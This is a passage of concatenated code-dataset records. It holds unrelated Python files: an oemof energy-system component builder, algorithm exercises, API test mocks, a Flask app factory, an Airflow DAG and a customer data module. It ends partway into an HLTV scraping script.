abs_hp_chiller.calc_characteristic_temp(\n t_hot=[tf['high temperature']],\n t_cool=t_cool,\n t_chill=[tf['chilling temperature']],\n coef_a=char_para[(char_para['name'] ==\n chiller_name)]['a'].values[0],\n coef_e=char_para[(char_para['name'] ==\n chiller_name)]['e'].values[0],\n method='kuehn_and_ziegler')\n # Calculation of cooling capacity\n q_dots_evap = abs_hp_chiller.calc_heat_flux(\n ddts=ddt,\n coef_s=char_para[(char_para['name'] ==\n chiller_name)]['s_E'].values[0],\n coef_r=char_para[(char_para['name'] ==\n chiller_name)]['r_E'].values[0],\n method='kuehn_and_ziegler')\n # Calculation of driving heat\n q_dots_gen = abs_hp_chiller.calc_heat_flux(\n ddts=ddt,\n coef_s=char_para[(char_para['name'] ==\n chiller_name)]['s_G'].values[0],\n coef_r=char_para[(char_para['name'] ==\n chiller_name)]['r_G'].values[0],\n method='kuehn_and_ziegler')\n # Calculation of COPs\n cops_abs = \\\n [Qevap / Qgen for Qgen, Qevap in zip(q_dots_gen, q_dots_evap)]\n\n logging.info(' ' + tf['label']\n + \", Average Coefficient of Performance (COP): {:2.2f}\"\n .format(numpy.mean(cops_abs)))\n\n # creates a source object as high temperature heat source and sets\n # heat capacity for this source\n maximum = tf['heat capacity of source']\n self.nodes_transformer.append(\n solph.Source(label=source_label,\n outputs={self.busd[\n tf['label'] + temp + '_bus']: solph.Flow(\n investment=solph.Investment(ep_costs=0,\n minimum=0,\n maximum=maximum,\n existing=0),\n variable_costs=0)}))\n\n # Returns logging info\n logging.info(\n ' ' + 'Heat Source created:' + source_label)\n\n # Set in- and outputs with conversion factors and creates transformer\n # object and adds it to the list of components\n inputs = {\"inputs\": {self.busd[tf['input']]: solph.Flow(\n variable_costs=tf['variable input costs'],\n emission_factor=\n tf['variable input constraint costs']),\n self.busd[tf['label'] + temp + '_bus']: solph.Flow(\n variable_costs=0)}}\n outputs = {\"outputs\": {self.busd[tf['output']]: solph.Flow(\n variable_costs=tf['variable output costs'],\n emission_factor=tf['variable output constraint costs'],\n investment=solph.Investment(\n ep_costs=tf['periodical costs'],\n minimum=tf['min. investment capacity'],\n maximum=tf['max. investment capacity'],\n existing=tf['existing capacity']))}}\n conversion_factors = {\n \"conversion_factors\": {\n self.busd[tf['output']]:\n [cop for cop in cops_abs],\n self.busd[tf['input']]:\n tf['electrical input conversion factor']\n }}\n self.create_transformer(tf, inputs, outputs, conversion_factors)\n\n def __init__(self, nodes_data, nodes, busd, weather_data):\n \"\"\" TODO Docstring missing \"\"\"\n # renames variables\n self.busd = busd\n self.nodes_transformer = []\n\n # creates a transformer object for every transformer item within nd\n for i, t in nodes_data['transformers'].iterrows():\n if t['active']:\n # Create Generic Transformers\n if t['transformer type'] == 'GenericTransformer':\n self.generic_transformer(t)\n \n # Create Compression Heat Transformer\n elif t['transformer type'] == 'CompressionHeatTransformer':\n self.compression_heat_transformer(t, weather_data)\n \n # Create Extraction Turbine CHPs\n elif t['transformer type'] == 'ExtractionTurbineCHP':\n logging.info(' ' + 'WARNING: ExtractionTurbineCHP are'\n ' currently not a part of this model '\n 'generator, but will be added later.')\n \n # Create Generic CHPs\n elif t['transformer type'] == 'GenericCHP':\n self.genericchp_transformer(t, nodes_data)\n \n # Create Offset Transformers\n elif t['transformer type'] == 'OffsetTransformer':\n logging.info(\n ' ' + 'WARNING: OffsetTransformer are currently'\n + ' not a part of this model generator, but will'\n + ' be added later.')\n\n # Create Absorption Chiller\n elif t['transformer type'] == 'AbsorptionHeatTransformer':\n self.absorption_heat_transformer(t, weather_data)\n\n # Error Message for invalid Transformers\n else:\n logging.info(' ' + 'WARNING: \\''\n + t['label']\n + '\\' was not created, because \\''\n + t['transformer type']\n + '\\' is no valid transformer type.')\n \n # appends created transformers to the list of nodes\n for i in range(len(self.nodes_transformer)):\n nodes.append(self.nodes_transformer[i])\n\n\nclass Storages:\n \"\"\"\n Creates oemof storage objects as defined in 'nodes_data' and\n adds them to the list of components 'nodes'.\n\n :param nodes_data: dictionary containing parameters of storages\n to be created.The following data have to be\n provided:\n\n - 'label'\n - 'active'\n - 'bus'\n - 'existing capacity / (kWh)'\n - 'min.investment capacity / (kWh)'\n - 'max.investment capacity / (kWh)'\n - 'non-convex investments'\n - 'fix investment costs'\n - 'input/capacity ratio (invest)'\n - 'output/capacity ratio (invest)'\n - 'capacity loss'\n - 'efficiency inflow'\n - 'efficiency outflow'\n - 'initial capacity'\n - 'capacity min'\n - 'capacity max'\n - 'variable input costs'\n - 'variable output costs'\n :type nodes_data: dict\n :param busd: dictionary containing the buses of the energy system\n :type busd: dict\n :param nodes: list of components created before(can be empty)\n :type nodes: list\n\n Christian Klemm - christian.klemm@fh-muenster.de\n \"\"\"\n def generic_storage(self, s):\n \"\"\"\n Creates a generic storage object with the parameters\n given in 'nodes_data' and adds it to the list of components 'nodes'\n ----\n Keyword arguments:\n t : obj:'dict'\n -- dictionary containing all information for\n the creation of an oemof storage.\n \"\"\"\n\n # creates storage object and adds it to the\n # list of components\n self.nodes.append(\n solph.components.GenericStorage(\n label=s['label'],\n inputs={self.busd[s['bus']]: solph.Flow(\n variable_costs=s[\n 'variable input costs'],\n emission_factor=s[\n 'variable input constraint costs']\n )},\n outputs={self.busd[s['bus']]: solph.Flow(\n variable_costs=s[\n 'variable output costs'],\n emission_factor=s[\n 'variable output constraint costs']\n )},\n loss_rate=s['capacity loss'],\n inflow_conversion_factor=s[\n 'efficiency inflow'],\n outflow_conversion_factor=s[\n 'efficiency outflow'],\n invest_relation_input_capacity=s[\n 'input/capacity ratio'],\n invest_relation_output_capacity=s[\n 'output/capacity ratio'],\n investment=solph.Investment(\n ep_costs=s[\n 'periodical costs'],\n periodical_constraint_costs=s[\n 'periodical constraint costs'],\n existing=s[\n 'existing capacity'],\n minimum=s[\n 'min. investment capacity'],\n maximum=s[\n 'max. investment capacity'],\n nonconvex=True if\n s['non-convex investment'] == 1 else False,\n offset=s['fix investment costs'])))\n\n # returns logging info\n logging.info(' ' + 'Storage created: ' + s['label'])\n\n def stratified_thermal_storage(self, s, data):\n \"\"\"\n Creates a stratified thermal storage object with the parameters\n given in 'nodes_data' and adds it to the list of components 'nodes'\n\n\n :type s: dict\n :param s: has to contain the following keyword arguments:\n - Standard information on Storages\n - 'storage type': 'Stratified'\n - 'diameter'\n - 'temperature high'\n - 'temperature low'\n - 'U value /(W/(sqm*K))'\n @ Yannick Wittor - yw090223@fh-muenster.de, 26.01.2021\n \"\"\"\n # import functions for stratified thermal storages from oemof thermal\n from oemof.thermal.stratified_thermal_storage import calculate_losses\n # Import weather Data\n data.index = pd.to_datetime(data[\"timestamp\"].values, utc=True)\n data.index = pd.to_datetime(data.index).tz_convert(\"Europe/Berlin\")\n # calculations for stratified thermal storage\n loss_rate, fixed_losses_relative, fixed_losses_absolute = \\\n calculate_losses(\n s['U value'],\n s['diameter'],\n s['temperature high'],\n s['temperature low'],\n data['temperature'])\n\n # creates storage object and adds it to the\n # list of components\n self.nodes.append(\n solph.components.GenericStorage(\n label=s['label'],\n inputs={self.busd[s['bus']]: solph.Flow(\n variable_costs=s[\n 'variable input costs'],\n emission_factor=s[\n 'variable input constraint costs']\n )},\n outputs={self.busd[s['bus']]: solph.Flow(\n variable_costs=s[\n 'variable output costs'],\n emission_factor=s[\n 'variable output constraint costs']\n )},\n min_storage_level=s['capacity min'],\n max_storage_level=s['capacity max'],\n loss_rate=loss_rate,\n fixed_losses_relative=fixed_losses_relative,\n fixed_losses_absolute=fixed_losses_absolute,\n inflow_conversion_factor=s[\n 'efficiency inflow'],\n outflow_conversion_factor=s[\n 'efficiency outflow'],\n invest_relation_input_capacity=s[\n 'input/capacity ratio'],\n invest_relation_output_capacity=s[\n 'output/capacity ratio'],\n investment=solph.Investment(\n ep_costs=s[\n 'periodical costs'],\n periodical_constraint_costs=s[\n 'periodical constraint costs'],\n existing=s[\n 'existing capacity'],\n minimum=s[\n 'min. investment capacity'],\n maximum=s[\n 'max. investment capacity'],\n nonconvex=True if\n s['non-convex investment'] == 1 else False,\n offset=s['fix investment costs'])))\n # returns logging info\n logging.info(' ' + 'Storage created: ' + s['label'])\n \n def __init__(self, nodes_data: dict, nodes: list, busd: dict):\n \"\"\"\n Inits the storage class.\n\n Christian Klemm - christian.klemm@fh-muenster.de\n \"\"\"\n # renames variables\n self.busd = busd\n self.nodes = []\n\n # creates storage object for every storage element in nodes_data\n for i, s in nodes_data['storages'].iterrows():\n if s['active']:\n\n # Create Generic Storage\n if s['storage type'] == 'Generic':\n self.generic_storage(s)\n\n # Create Generic Storage\n if s['storage type'] == 'Stratified':\n self.stratified_thermal_storage(s,\n nodes_data['weather data'])\n\n # appends created storages to the list of nodes\n for i in range(len(self.nodes)):\n nodes.append(self.nodes[i])\n\n\nclass Links:\n \"\"\"\n Creates links objects as defined in 'nodes_data' and adds them\n to the list of components 'nodes'.\n\n # TODO Excel columns missing\n\n :param nodes_data: dictionary containing data from excel\n scenario file. The following data have to be\n provided:\n\n - 'active'\n - 'label'\n - '(un)directed'\n :type nodes_data: dict\n :param busd: dictionary containing the buses of the energy system\n :type busd: dict\n :param nodes: list of components created before(can be empty)\n :type nodes: list\n\n Christian Klemm - christian.klemm@fh-muenster.de\n \"\"\"\n # intern variables\n busd = None\n \n def __init__(self, nodes_data, nodes, bus):\n \"\"\"\n Inits the Links class.\n\n Christian Klemm - christian.klemm@fh-muenster.de\n \"\"\"\n # renames variables\n self.busd = bus\n # creates link objects for every link object in nd\n for i, link in nodes_data['links'].iterrows():\n if link['active']:\n if link['(un)directed'] == 'directed':\n ep_costs = link['periodical costs']\n elif link['(un)directed'] == 'undirected':\n ep_costs = link['periodical costs'] / 2\n else:\n raise SystemError('Problem with periodical costs')\n nodes.append(solph.custom.Link(\n label=link['label'],\n inputs={self.busd[link['bus1']]: solph.Flow(),\n self.busd[link['bus2']]: solph.Flow()},\n outputs={self.busd[link['bus2']]: solph.Flow(\n variable_costs=\n link['variable output costs'],\n emission_factor=\n link['variable constraint costs'],\n investment=solph.Investment(\n ep_costs=ep_costs,\n periodical_constraint_costs=link[\n 'periodical constraint costs'],\n minimum=link[\n 'min. investment capacity'],\n maximum=link[\n 'max. investment capacity'],\n existing=link[\n 'existing capacity'],\n nonconvex=True if\n link['non-convex investment'] == 1\n else False,\n offset=link[\n 'fix investment costs'])),\n self.busd[link['bus1']]: solph.Flow(\n variable_costs=\n link['variable output costs'],\n emission_factor=\n link['variable constraint costs'],\n investment=solph.Investment(\n ep_costs=ep_costs,\n periodical_constraint_costs=link[\n 'periodical constraint costs'],\n minimum=link[\n 'min. investment capacity'],\n maximum=link[\n 'max. investment capacity'],\n existing=link[\n 'existing capacity'],\n nonconvex=True if\n link['non-convex investment'] == 1\n else False,\n offset=link[\n 'fix investment costs'])), },\n conversion_factors={\n (self.busd[link['bus1']],\n self.busd[link['bus2']]): link['efficiency'],\n (self.busd[link['bus2']],\n self.busd[link['bus1']]):\n (link['efficiency']\n if link['(un)directed'] == 'undirected' else 0)}\n ))\n # returns logging info\n logging.info(' ' + 'Link created: ' + link['label'])\n","sub_path":"program_files/create_objects.py","file_name":"create_objects.py","file_ext":"py","file_size_in_byte":85067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"336990812","text":"'''\nProblem Statement\n\nGiven an expression string x. Examine whether the pairs and the orders of “{“,”}”,”(“,”)”,”“,”” are correct in exp.\n\nInput Format\n\nA single string s containing the parenthesis.\n\nConstraints\n\n1<=length of string<=1000\n\nOutput Format\n\nPrint \"1\" if brackets are balanced else print \"0\".\n\n\n'''\n\n\nclass Stack:\n def __init__(self):\n self.s=[] \n def pop_ele(self,c):\n if(self.s[-1]=='{' and c=='}'):\n self.s.pop()\n return 1\n elif(self.s[-1]=='[' and c==']'):\n self.s.pop()\n return 1\n elif(self.s[-1]=='(' and c==')'):\n self.s.pop()\n return 1\n else:\n return 0\n \n def push(self,ele):\n self.s.append(ele)\n \n def length(self):\n return len(self.s )\n \n \nbrac=list(input().strip())\ns=Stack()\nfor i in brac:\n if(i=='{' or i=='[' or i=='('):\n s.push(i)\n else:\n if(s.pop_ele(i)):\n continue\n else:\n break\nif(s.length()==0):\n print('1')\nelse:\n print('0')\n\n\n#end\n","sub_path":"parenthesis_stack.py","file_name":"parenthesis_stack.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"391993792","text":"\"\"\"\nMinimum Domino Rotations For Equal Row\nIn a row of dominoes, A[i] and B[i] represent the top and bottom halves of the ith domino. (A domino is a tile with two numbers from 1 to 6 - one on each half of the tile.)\n\nWe may rotate the ith domino, so that A[i] and B[i] swap values.\n\nReturn the minimum number of rotations so that all the values in A are the same, or all the values in B are the same.\n\nIf it cannot be done, return -1.\n\n\n\nExample 1:\n\n\nInput: A = [2,1,2,4,2,2], B = [5,2,6,2,3,2]\nOutput: 2\nExplanation:\nThe first figure represents the dominoes as given by A and B: before we do any rotations.\nIf we rotate the second and fourth dominoes, we can make every value in the top row equal to 2, as indicated by the second figure.\nExample 2:\n\nInput: A = [3,5,1,2,3], B = [3,6,3,3,4]\nOutput: -1\nExplanation:\nIn this case, it is not possible to rotate the dominoes to make one row of values equal.\n\n\nConstraints:\n\n2 <= A.length == B.length <= 2 * 104\n1 <= A[i], B[i] <= 6\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def minDominoRotations(self, A: List[int], B: List[int]) -> int:\n # Solution 1 - 1272 ms\n \"\"\"\n s, n = set([1, 2, 3, 4, 5, 6]), len(A)\n for i in range(n):\n s &= set([A[i], B[i]])\n if not s:\n return -1\n flips1 = sum(A[i] == list(s)[0] for i in range(n))\n flips2 = sum(B[i] == list(s)[0] for i in range(n))\n return min(n - flips1, n - flips2)\n \"\"\"\n # Solution 2 - 1004 ms\n assert (len(A) >= 2)\n\n def check(x):\n \"\"\"\n Return min number of swaps\n if one could make all elements in A or B equal to x.\n Else return -1.\n \"\"\"\n # how many rotations should be done\n # to have all elements in A equal to x\n # and to have all elements in B equal to x\n rotations_a = rotations_b = 0\n for i in range(n):\n # rotations coudn't be done\n if A[i] != x and B[i] != x:\n return -1\n # A[i] != x and B[i] == x\n elif A[i] != x:\n rotations_a += 1\n # A[i] == x and B[i] != x\n elif B[i] != x:\n rotations_b += 1\n # min number of rotations to have all\n # elements equal to x in A or B\n return min(rotations_a, rotations_b)\n\n n = len(A)\n rotations = check(A[0])\n # If one could make all elements in A or B equal to A[0]\n if rotations != -1:\n return rotations\n # If one could make all elements in A or B equal to B[0]\n else:\n return check(B[0])\n\n\n\n\n# Main call\nsolution = Solution()\nA = [2,1,2,4,2,2]\nB = [5,2,6,2,3,2]\n\nprint(solution.minDominoRotations(A, B))","sub_path":"src/arrays/minDominoRotations.py","file_name":"minDominoRotations.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"146288214","text":"import json\n\n\nAPI_RESPONSE = {\n 'token': {\n 'failed': {\n 'error': 'invalid_grant',\n 'error_description': 'The provided authorization grant is invalid, expired, revoked, does not match the redirection URI used in the authorization request, or was issued to another client.'\n },\n 'success': {\n 'access_token': '7fe9ad7e6aeccac0cbc29af7a4b3fb180a8f0c48f2529a0e182659f2e97fecf8',\n 'token_type': 'Bearer',\n 'scope': 'write login',\n 'created_at': 1626487193\n }\n },\n 'observation': {\n 'success': [\n {\n \"id\": 83433296,\n \"observed_on\": \"2021-06-17\",\n \"description\": None,\n \"latitude\": \"-39.8371200562\",\n \"longitude\": \"-73.2069473267\",\n \"map_scale\": None,\n \"timeframe\": None,\n \"species_guess\": \"Mariposas y polillas\",\n \"user_id\": 3918216,\n \"taxon_id\": 47157,\n \"created_at\": \"2021-06-17T21:06:54.468Z\",\n \"updated_at\": \"2021-06-18T14:45:32.473Z\",\n \"place_guess\": \"Valdivia\",\n \"id_please\": False,\n \"observed_on_string\": \"Thu Jun 17 2021 17:02:30 GMT -0400 (GMT-4)\",\n \"iconic_taxon_id\": 47158,\n \"num_identification_agreements\": 2,\n \"num_identification_disagreements\": 0,\n \"time_observed_at\": \"2021-06-17T21:02:30.000Z\",\n \"time_zone\": \"Santiago\",\n \"location_is_exact\": False,\n \"delta\": False,\n \"positional_accuracy\": 202,\n \"private_latitude\": None,\n \"private_longitude\": None,\n \"geoprivacy\": None,\n \"quality_grade\": \"needs_id\",\n \"positioning_method\": None,\n \"positioning_device\": None,\n \"out_of_range\": None,\n \"license\": \"CC-BY-NC\",\n \"uri\": \"https://www.inaturalist.org/observations/83433296\",\n \"observation_photos_count\": 1,\n \"comments_count\": 0,\n \"zic_time_zone\": \"America/Santiago\",\n \"oauth_application_id\": 333,\n \"observation_sounds_count\": 0,\n \"identifications_count\": 2,\n \"captive\": False,\n \"community_taxon_id\": 47157,\n \"site_id\": 1,\n \"old_uuid\": None,\n \"public_positional_accuracy\": 202,\n \"mappable\": True,\n \"cached_votes_total\": 0,\n \"last_indexed_at\": \"2021-06-18T14:45:36.018Z\",\n \"private_place_guess\": None,\n \"uuid\": \"0faceebf-5e45-4d52-b2ee-08909c9f7f17\",\n \"taxon_geoprivacy\": None,\n \"short_description\": None,\n \"user_login\": \"ndarwin\",\n \"iconic_taxon_name\": \"Insecta\",\n \"tag_list\": [],\n \"faves_count\": 0,\n \"created_at_utc\": \"2021-06-17T21:06:54.468Z\",\n \"updated_at_utc\": \"2021-06-18T14:45:32.473Z\",\n \"time_observed_at_utc\": \"2021-06-17T21:02:30.000Z\",\n \"owners_identification_from_vision\": True,\n \"taxon\": {\n \"id\": 47157,\n \"name\": \"Lepidoptera\",\n \"rank\": \"order\",\n \"ancestry\": \"48460/1/47120/372739/47158/184884\",\n \"common_name\": {\n \"id\": 865882,\n \"name\": \"Butterflies and Moths\",\n \"is_valid\": True,\n \"lexicon\": \"English\"\n }\n },\n \"iconic_taxon\": {\n \"id\": 47158,\n \"name\": \"Insecta\",\n \"rank\": \"class\",\n \"rank_level\": 50.0,\n \"ancestry\": \"48460/1/47120/372739\"\n },\n \"user\": {\n \"login\": \"ndarwin\",\n \"user_icon_url\": None\n },\n \"photos\": [\n {\n \"id\": 137026879,\n \"user_id\": 3918216,\n \"native_photo_id\": \"137026879\",\n \"square_url\": \"https://inaturalist-open-data.s3.amazonaws.com/photos/137026879/square.jpeg?1623964017\",\n \"thumb_url\": \"https://inaturalist-open-data.s3.amazonaws.com/photos/137026879/thumb.jpeg?1623964017\",\n \"small_url\": \"https://inaturalist-open-data.s3.amazonaws.com/photos/137026879/small.jpeg?1623964017\",\n \"medium_url\": \"https://inaturalist-open-data.s3.amazonaws.com/photos/137026879/medium.jpeg?1623964017\",\n \"large_url\": \"https://inaturalist-open-data.s3.amazonaws.com/photos/137026879/large.jpeg?1623964017\",\n \"created_at\": \"2021-06-17T21:06:59.196Z\",\n \"updated_at\": \"2021-06-17T21:06:59.196Z\",\n \"native_page_url\": \"https://www.inaturalist.org/photos/137026879\",\n \"native_username\": \"ndarwin\",\n \"native_realname\": \"Nelson\",\n \"license\": 2,\n \"subtype\": None,\n \"native_original_image_url\": None,\n \"uuid\": \"d3336fc4-aacf-44a1-80bc-7046b14c4ac7\",\n \"license_code\": \"CC-BY-NC\",\n \"attribution\": \"(c) Nelson, some rights reserved (CC BY-NC)\",\n \"license_name\": \"Creative Commons Attribution-NonCommercial License\",\n \"license_url\": \"http://creativecommons.org/licenses/by-nc/4.0/\",\n \"type\": \"LocalPhoto\"\n }\n ]\n }\n ]\n }\n}\n\n\nclass ItemMock:\n def __init__(self):\n self.bbox = json.dumps({'sw': {'lat': 1, 'lng': 1}, 'ne': {'lat': 1, 'lng': 1}})\n self.results = json.dumps([\n {\n 'photos': [\n {\n 'thumb_url': 'http://thumb.url.com/img.png',\n 'large_url': 'http://thumb.url.com/img.png',\n }\n ],\n 'b': 2\n }\n ])\n self.created = ''\n self.uri = ''\n self.user_id = ''\n\n\nclass TableRefMock:\n\n def __iter__(self):\n return [ItemMock(), ItemMock()]\n\n\nclass RowResultMock:\n\n @property\n def total_rows(self):\n return 1\n\n\nclass QJobMock:\n def result(self):\n return RowResultMock()\n\n @property\n def destination(self):\n return TableRefMock()\n\n\nclass RowIterMock:\n def __iter__(self):\n for i in [ItemMock(), ItemMock()]:\n yield i\n\n\nclass TableIterMock:\n def __iter__(self):\n for i in [ItemMock(), ItemMock()]:\n yield i\n\n\nclass BQClientMock:\n def __init__(self, **kwargs):\n self.insert = kwargs.get('insert', True)\n pass\n\n def query(self, qs: str) -> QJobMock:\n return QJobMock()\n\n def get_table(self, p: RowIterMock) -> TableIterMock:\n return TableIterMock()\n\n def list_rows(self, dest, **kwargs):\n return RowIterMock()\n\n def insert_rows_json(self, tbl_id: str, list_dict: list) -> list:\n if not self.insert:\n return [\n {\n 'index': 0,\n 'errors': [\n {\n 'reason': 'invalid',\n 'location': 'x_id',\n 'debugInfo': '',\n 'message': 'no such field: x_id.'\n }\n ]\n }\n ]\n\n return []\n\n\nclass bquerymock:\n\n def __init__(self, **kwargs):\n self.args = kwargs\n\n def Client(self):\n return BQClientMock(**self.args)\n","sub_path":"back/api/tests/mocks.py","file_name":"mocks.py","file_ext":"py","file_size_in_byte":8027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"259659436","text":"import sys\nimport pickle\nimport glob\nimport pandas as pd\nimport numpy as np\nfrom argparse import ArgumentParser\n\n\nif __name__ == '__main__':\n\n parser = ArgumentParser()\n\n parser.add_argument(\n \"-m\",\n \"--mode\",\n type=str,\n dest=\"mode\",\n help='cassette or telemetry or file',\n default=None)\n\n parser.add_argument(\n \"-t\",\n \"--type\",\n type=str,\n dest=\"type\",\n help='output type pickle or parquet',\n default='pickle')\n\n parser.add_argument(\n \"-f\",\n \"--file\",\n action='append',\n dest=\"files\",\n help='files to be merged',\n default=[])\n\n parser.add_argument(\n \"-d\",\n \"--debug\",\n action='store_true',\n dest='debug',\n help='debug print mode',\n default=False)\n\n options = parser.parse_args()\n if options.mode in ('cassette', 'telemetry'):\n loc = f'../data/{options.mode}.*.pkl'\n files = glob.glob(loc)\n else:\n files = None\n\n if options.files != []:\n files = [f\"../data/{f}\" for f in options.files]\n\n merged_df = None\n i = 1\n for f in files:\n data = pickle.load(open(f, \"rb\"))\n if merged_df is None:\n merged_df = pd.DataFrame(data, columns=['recording', 'time', 'X', 'y'])\n else:\n df = pd.DataFrame(data, columns=['recording', 'time', 'X', 'y'])\n df.drop(columns=['y'], inplace=True)\n merged_df = merged_df.merge(df, on=['recording', 'time'], how='inner', suffixes=(\"\", f\"_{i}\"))\n i += 1\n merged_df.rename(columns={'X': 'X_1'}, inplace=True)\n for j in range(1, i):\n if merged_df[f'X_{j}'].loc[0].ndim == 1:\n dfc = merged_df.copy()\n cols = []\n for k in range(merged_df[f'X_{j}'].loc[0].shape[0]):\n cols.append(f'X_{j}_{k}')\n dfc[cols] = pd.DataFrame(dfc[f'X_{j}'].tolist(), index=dfc.index)\n merged_df = pd.concat((merged_df, dfc[cols]), axis=1)\n merged_df = merged_df.drop(columns=[f'X_{j}'])\n\n if options.type == 'pickle':\n if options.mode in ('cassette', 'telemetry'):\n outfile = f'../data/{options.mode}.pkl'\n else:\n if len(files) == 1:\n outfile = f'../data/merged-{options.files[0]}'\n else:\n outfile = f'../data/merged-output.pkl'\n merged_df.to_pickle(outfile)\n else:\n if options.mode in ('cassette', 'telemetry'):\n outfile = f'../data/{options.mode}.pkt'\n else:\n if len(files) == 1:\n fn = (options.files[0]).replace('pkl', 'pqt')\n outfile = f'../data/merged-{fn}'\n else:\n outfile = f'../data/merged-output.pkt'\n merged_df.to_parquet(outfile)\n print(merged_df)\n print(outfile)\n","sub_path":"code/merge_features.py","file_name":"merge_features.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"597910494","text":"\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import LoginManager\nfrom flask_bootstrap import Bootstrap\ndb = SQLAlchemy()\nlogin_manager = LoginManager()\nbootstrap = Bootstrap()\n\n\ndef create_app():\n app = Flask(__name__)\n app.config[\"SECRET_KEY\"] = 'secret'\n app.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///app.db\"\n app.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\n\n db.init_app(app)\n login_manager.init_app(app)\n bootstrap.init_app(app)\n\n\n from app import routes\n routes.init_app(app)\n\n return app\n\n","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"235226921","text":"# -*- coding:UTF-8 -*-\r\nfrom sqlalchemy.orm.exc import NoResultFound\r\nfrom lite_mms import models\r\nfrom lite_mms.apis import ModelWrapper\r\nfrom lite_mms.utilities import do_commit\r\n\r\nclass CustomerWrapper(ModelWrapper):\r\n def __str__(self):\r\n return self.name\r\n\r\n def __eq__(self, other):\r\n return isinstance(other, CustomerWrapper) and other.id == self.id\r\n\r\n def __hash__(self):\r\n return hash(self.id)\r\n\r\n @classmethod\r\n def get_list(cls):\r\n \"\"\"\r\n get customer list from database\r\n \"\"\"\r\n return [CustomerWrapper(c) for c in models.Customer.query.all()]\r\n\r\n\r\n @classmethod\r\n def get_customer(cls, customer_id):\r\n \"\"\"\r\n get a customer by id from database\r\n :return: the customer of given id or None if there's no such customer\r\n \"\"\"\r\n if not customer_id:\r\n return None\r\n try:\r\n return CustomerWrapper(models.Customer.query.filter(\r\n models.Customer.id == customer_id).one())\r\n except NoResultFound:\r\n return None\r\n\r\n @classmethod\r\n def get_customer_list(cls, model):\r\n q = models.Customer.query\r\n if model:\r\n q = q.join(model).filter(model.customer != None)\r\n return [CustomerWrapper(customer) for customer in q.all()]\r\n\r\ndef post_customers(data):\r\n count = 0\r\n for customer in data:\r\n try:\r\n models.Customer.query.filter(\r\n models.Customer.name == customer[\"name\"]).one()\r\n except NoResultFound:\r\n do_commit(models.Customer(name=customer[\"name\"],\r\n abbr=customer[\"short\"],\r\n MSSQL_ID=customer[\"id\"]))\r\n count += 1\r\n return u\"成功添加%d条客户信息\" % count\r\n\r\nget_customer_list = CustomerWrapper.get_list\r\nget_customer = CustomerWrapper.get_customer\r\n","sub_path":"lite_mms/apis/customer.py","file_name":"customer.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"425191518","text":"def fibo(n):\r\n if n <= 2:\r\n return 1\r\n #print(n)\r\n return fibo(n - 1) + fibo(n - 2)\r\n\r\nmemo = {\r\n 1: 1,\r\n 2: 1\r\n}\r\n\r\ndef fibo_m(n):\r\n if n not in memo:\r\n print(str(n) + \": \" + str(memo))\r\n memo[n-2] = fibo_m(n - 2)\r\n memo[n-1] = fibo_m(n - 1)\r\n memo[n] = memo[n-1] + memo[n-2]\r\n return memo[n]\r\n\r\ndef memoize(fn, n):\r\n __memo = {}\r\n if n not in __memo:\r\n __memo[n] = fn(n)\r\n return __memo[n]\r\n\r\ndef fibo_m_f(n):\r\n return memoize(fibo, n)\r\n\r\nclass Memoize:\r\n def __init__(self, f):\r\n self.f = f\r\n self.memo = {}\r\n\r\n def __call__(self, *args):\r\n if not args in self.memo:\r\n self.memo[args] = self.f(*args)\r\n return self.memo[args]\r\n\r\nfibo_1 = Memoize(fibo)\r\n\r\n@Memoize\r\ndef fibo_2(n):\r\n if n <= 2:\r\n return 1\r\n return fibo_2(n - 2) + fibo_2(n - 1)\r\n\r\nfor i in range(1, 10):\r\n #print(fibo(i))\r\n #print(fibo_m(i))\r\n pass\r\n\r\n#fibo(10)\r\n#fibo_m(10)\r\n#fibo_m_f(10)\r\nfibo_1(10)\r\nfibo_2(10)\r\n\r\n","sub_path":"posts/it - python get started/python - decorator/demo_memoization.py","file_name":"demo_memoization.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"313811083","text":"from airflow.models import DAG\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.operators.bash_operator import BashOperator\nfrom datetime import datetime, timedelta\n\ndefault_args = {\n 'owner': 'airflow',\n 'depends_on_past': False,\n 'retries': 0,\n 'priority_weight': 5\n}\ndag = DAG(\n 'date',\n default_args=default_args,\n schedule_interval='01 00 * * *',\n max_active_runs=100\n)\n\ndef task1():\n print(\"hello world, hello airflow !!\")\ntask01 = PythonOperator(\n task_id='task1',\n python_callable=task1,\n start_date=datetime(2018, 7, 20),\n retries=0,\n dag=dag\n)\n\ndef task2():\n print(\"welcome to study airflow\")\ntask02 = PythonOperator(\n task_id='task2',\n python_callable=task2,\n start_date=datetime(2018, 7, 25),\n retries=0,\n dag=dag\n)\n\n","sub_path":"airflow/dag/date_dag.py","file_name":"date_dag.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"273820087","text":"# Own\nfrom mHLTVAPI import *\nfrom csgoDB import *\n\n# Standard\nimport os\nimport time\nimport random\n\n'''\nMines data from HLTV and writes it to sqlite db.\n-Request result pages from hltv\n--For each page, go through all matches,\n---Write data to local sqlite database\n-Request finished events from hltv\n--Write all to same database\n'''\n\n# Basic example of hltvAPI + csgoDB usage\ndef loadTestData():\n\tfor j in range(9, 20):\n\t\tpage = GetMatchResultsPage(j)\n\t\tfor i in 